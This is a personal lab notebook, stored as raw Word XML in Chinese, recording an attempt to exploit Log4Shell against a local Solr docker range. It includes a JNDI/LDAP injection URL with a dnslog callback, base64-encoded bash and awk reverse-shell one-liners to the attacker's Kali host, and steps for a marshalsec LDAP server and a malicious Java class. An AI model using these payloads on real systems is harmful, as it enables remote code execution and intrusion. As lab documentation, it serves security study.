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FDF5F" w14:textId="77E57485" w:rsidR="00934327" w:rsidRDefault="000002BF" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场搭建就略过了，不是因为简单，而是因为我走了太多弯路，说多了都是泪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A5E5D" w14:textId="3EA8C5F2" w:rsidR="000002BF" w:rsidRDefault="000002BF" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我跑去给虚拟机搞科学上网的代理了</w:t>
      </w:r>
      <w:r w:rsidR="00F77859">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，kali还比ubuntu麻烦一点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，具体看我的另一个docx吧，结果最后还是换源搞定的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53893396" w14:textId="77777777" w:rsidR="000002BF" w:rsidRDefault="000002BF" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26705EE7" w14:textId="13EEA864" w:rsidR="000002BF" w:rsidRDefault="000002BF" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docker-compose up -d启动靶场，-d不加也行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480BEC3" w14:textId="24E74797" w:rsidR="000002BF" w:rsidRDefault="000002BF" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docker-compose ps查看具体信息，主要是为了看看端口，8983</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C664CA" w14:textId="6338009A" w:rsidR="000002BF" w:rsidRDefault="000002BF" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开127.0.0.1:8983可以看到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C95F5EE" w14:textId="58D5038A" w:rsidR="000002BF" w:rsidRDefault="000002BF" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000002BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EF59F7E" wp14:editId="6A1D9474">
            <wp:extent cx="5274310" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1955856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6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532" w14:textId="4C55CCDB" w:rsidR="00E9659A" w:rsidRDefault="00E9659A" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后发现完全无法成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A407B" w14:textId="77777777" w:rsidR="00E9659A" w:rsidRDefault="00E9659A" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8BD6E3" w14:textId="77847C94" w:rsidR="000002BF" w:rsidRDefault="00E9659A" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查过solr的版本/各种输入协议等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21BD23" w14:textId="11518227" w:rsidR="00E9659A" w:rsidRDefault="00B9116E" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java版本可以通过 docker exec 编号 java -version 查询，判断也没有问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768590B6" w14:textId="77777777" w:rsidR="00B9116E" w:rsidRDefault="00B9116E" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DED924C" w14:textId="25FA6325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8-26号重新测试，突然就成功了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D7CED0" w14:textId="207F00CD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这次构造的命令和之前是一样的：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9116E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.3cd980a7.log.dnslog.store.}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A82AF" w14:textId="2BF48446" w:rsidR="00B9116E" w:rsidRDefault="00B9116E" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9116E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E834114" wp14:editId="1A7DFAB8">
            <wp:extent cx="5274310" cy="2254250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="155541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14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CF7F" w14:textId="77777777" w:rsidR="00B9116E" w:rsidRDefault="00B9116E" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456F1FA2" w14:textId="77777777" w:rsidR="00B9116E" w:rsidRDefault="00B9116E" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D37C69B" w14:textId="24B3FB26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lastRenderedPageBreak/>
        <w:t>正式攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2506E170" w14:textId="22055299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第一步，尝试构造反弹shell并链接到kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B135AB" w14:textId="38D0B5F2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目标命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9116E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidR="00173563">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9116E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/7777 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28960256" w14:textId="21828105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编码：</w:t>
      </w:r>
      <w:r w:rsidR="00173563" w:rsidRPr="00173563">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuMTUvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031ECC76" w14:textId="03A889D8" w:rsidR="00B9116E" w:rsidRDefault="00B9116E" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建expolit.java文件</w:t>
      </w:r>
      <w:r w:rsidR="00173563">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（记得回来改这张图</w:t>
      </w:r>
      <w:r w:rsidR="00D26FDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里的base64码是错的</w:t>
      </w:r>
      <w:r w:rsidR="00173563">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533449B" w14:textId="7DAECA4A" w:rsidR="005E48B0" w:rsidRDefault="005E48B0" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E48B0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359385AD" wp14:editId="4E116998">
            <wp:extent cx="5274310" cy="3871595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="515363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3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B8A8" w14:textId="588BDDC0" w:rsidR="005E48B0" w:rsidRDefault="005E48B0" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译它</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D3062A" w14:textId="304B4E16" w:rsidR="005E48B0" w:rsidRDefault="005E48B0" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kali不自带javac，可以用apt install default-jdk安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF39934" w14:textId="00514D7D" w:rsidR="005E48B0" w:rsidRDefault="005E48B0" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在恶意文件所在位置打开http服务：</w:t>
      </w:r>
      <w:r w:rsidRPr="005E48B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python -m http.server 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942F9A3" w14:textId="15B343AA" w:rsidR="005E48B0" w:rsidRDefault="005E48B0" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E48B0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19378B94" wp14:editId="5BEDF0D8">
            <wp:extent cx="5274310" cy="2033905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="867582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8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6DC" w14:textId="57C6CB19" w:rsidR="00173563" w:rsidRDefault="00173563" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00173563">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="006A63C4" wp14:editId="6C273CAC">
            <wp:extent cx="4445000" cy="1797050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="791163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63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167" cy="18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DAE" w14:textId="77777777" w:rsidR="005E48B0" w:rsidRDefault="005E48B0" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFBCE97" w14:textId="215C26CD" w:rsidR="00796CB6" w:rsidRDefault="00796CB6" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r w:rsidRPr="00796CB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里需要使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tooltip="marshalsec-0.0.3-SNAPSHOT-all.jar" w:history="1">
        <w:r w:rsidRPr="00796CB6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>marshalsec-0.0.3-SNAPSHOT-all.jar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00796CB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开LDAP服务，而启动需要maven先构造此工具，maven可以用apt install maven 安装。构造需要几分钟时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A46C844" w14:textId="53FBE109" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383DA38C" w14:textId="60261BF4" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A41217">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="310B4CAA" wp14:editId="44561794">
            <wp:extent cx="5274310" cy="2071370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="311872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2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10D3" w14:textId="77777777" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D92CD0D" w14:textId="3FF44991" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另起一个终端监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BBE3C" w14:textId="393C34EF" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A41217">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55C78A77" wp14:editId="6317E8AC">
            <wp:extent cx="3057952" cy="1333686"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="83063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E32" w14:textId="77777777" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB2A8AA" w14:textId="770AC92F" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我就失败了: (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C237B7" w14:textId="5CD51063" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到了LDAP，但是7777端口没有收到反向连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D51C2D2" w14:textId="61C3A690" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A41217">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29D9CB70" wp14:editId="6E563ACF">
            <wp:extent cx="5274310" cy="1456690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="133326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6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A4C9" w14:textId="397E4538" w:rsidR="00A41217" w:rsidRDefault="00A41217" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">显而易见，我ip把10.0.2.15写成10.0.2.5了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>: |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6987F" w14:textId="596B65F3" w:rsidR="00100609" w:rsidRDefault="00100609" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>重启一下LDAP服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8558BD" w14:textId="28C1A6A3" w:rsidR="00A41217" w:rsidRDefault="00100609" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100609">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28228672" wp14:editId="3AC4942D">
            <wp:extent cx="5274310" cy="741680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="144307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DD0" w14:textId="77777777" w:rsidR="00100609" w:rsidRDefault="00100609" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B82E5F0" w14:textId="25A3823C" w:rsidR="00100609" w:rsidRDefault="00100609" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这下http:4444处也正确回显，但是没有收到反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27793FFC" w14:textId="2FB2D9E2" w:rsidR="00100609" w:rsidRDefault="00100609" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100609">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B5D8DFC" wp14:editId="1A3DA9AA">
            <wp:extent cx="2608401" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="294890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0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7956" cy="32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96" w14:textId="77777777" w:rsidR="00DC1535" w:rsidRDefault="00DC1535" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F2A69A" w14:textId="36EC3D31" w:rsidR="00DC1535" w:rsidRDefault="00DC1535" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排错之后，目前觉得应该是因为tcp连接没有成功建立导致的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E56A732" w14:textId="3116263E" w:rsidR="000101DD" w:rsidRDefault="00DC1535" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1535">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47755AA7" wp14:editId="7C23A2D7">
            <wp:extent cx="5048955" cy="685896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199786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65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1011" w14:textId="2D669494" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们换成awk反弹shell重新编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA4EC9D" w14:textId="61892AC5" w:rsidR="000101DD" w:rsidRPr="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000101DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>awk 'BEGIN {s = "/inet/tcp/0/10.0.2.15/7777"; while(42) { do{ printf "shell&gt;" |&amp; s; s |&amp; getline c; if(c){ while ((c |&amp; getline) &gt; 0) print $0 |&amp; s; close(c); } } while(c != "exit") close(s); }}' /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763CF730" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7949AE" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F1A56F" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569DC564" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA33302" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F74D219" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B09848" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C03AF0D" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C8B830" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C045F3" w14:textId="545F4436" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>主机测试可行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C5E1E" w14:textId="5A9236C8" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000101DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="364C78E3" wp14:editId="53BD78B5">
            <wp:extent cx="5274310" cy="1948180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="163752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4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F67" w14:textId="77777777" w:rsidR="000101DD" w:rsidRDefault="000101DD" w:rsidP="00B9116E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129889E2" w14:textId="4A251E44" w:rsidR="00940261" w:rsidRDefault="000101DD" w:rsidP="00DD3EE4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在打开所有页面，确认状态</w:t>
      </w:r>
      <w:r w:rsidR="00C14A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现还是不行</w:t>
      </w:r>
